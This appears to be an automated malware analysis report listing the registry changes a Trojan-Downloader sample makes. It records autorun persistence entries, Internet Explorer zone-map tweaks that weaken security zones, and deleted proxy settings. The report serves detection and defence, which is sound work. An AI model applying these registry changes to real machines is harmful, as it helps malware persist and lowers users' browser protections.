[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "nss15.tmp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nss15\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 88 F5 76 5C E3 D1 CF 91 A9 B0 45 24 52 0D 7E"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nss15\DEBUG]
"Trace Level"

The process nss15.tmp:2668 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF AA 55 FD D8 31 E1 02 32 19 94 A8 7D 7D 76 42"

The process HY2F7WRL5V.exe:568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\SpaceSoundPro]
"ConfigPath" = "%Program Files%\SpaceSoundPro\config"
"Start Menu Folder" = "SpaceSoundPro 1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"InstallDate" = "20150803153554"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"UninstallString" = "%Program Files%\SpaceSoundPro\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"CustomID" = "241927763"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd9.tmp\NSISpcre.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"DisplayName" = "SpaceSoundPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\SpaceSoundPro]
"InstallPath" = "%Program Files%\SpaceSoundPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"NoModify" = "1"
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Audio]
"DisableProtectedAudioDG" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 5E 1A 74 81 74 03 7D A8 DF 7D B9 0B 36 8A D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpaceSoundPro" = "%Program Files%\SpaceSoundPro\SpaceSoundPro.exe"

The process AutoTime_51477.exe:4032 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 CF 71 5C E4 FA 4C DB 84 E4 66 AE 88 65 E9 0A"

The process win.exe:484 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Caster]
"wizzcaster.exe" = "BShyah"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"UninstallString" = "%Program Files%\Caster\Uninstaller.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayName" = "Caster"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"Publisher" = "Caster"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Wizzlabs\Wizzcaster]
"Identifier" = "csdi"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 39 76 7A DC 47 BE 61 3E 67 DD 11 DC B1 8A 69"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Caster" = "%Program Files%\Caster\wizzcaster.exe"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process AutoTime_51477.tmp:4080 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 1A EE 6C 36 81 5E 1B 36 DB 3C CB 79 D0 ED 0E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "AutoTime_51477.tmp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KS1NL.tmp]
"AutoTime.exe" = "AutoShut Microsoft 基础类应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process nsl1E.tmp:2172 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsl1E\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 9A 94 81 7E 98 93 99 69 68 DD 84 46 A4 29 B3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsl1E\DEBUG]
"Trace Level"

The process idscservice.exe:1920 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 C2 1A 72 B2 6F 08 27 F7 86 67 10 68 21 D6 3C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX]
"win.exe" = "UbN"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX]
"testversion.exe" = "TGo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"IDSCPRODUCT" = "%Program Files%\SpaceSoundPro\idscservice.exe"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process idscservice.exe:1368 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 A8 66 99 46 E0 35 60 C2 3B 6D 3C 81 06 DF 4F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process nsjB.tmp:1568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 94 18 27 5A 35 A6 C4 9D 5F 6C 6A 52 C1 C7 A1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayName" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"Publisher" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe"

The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 5B 57 8E 4F 1B B4 80 8E 39 29 75 46 6F 72 F6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

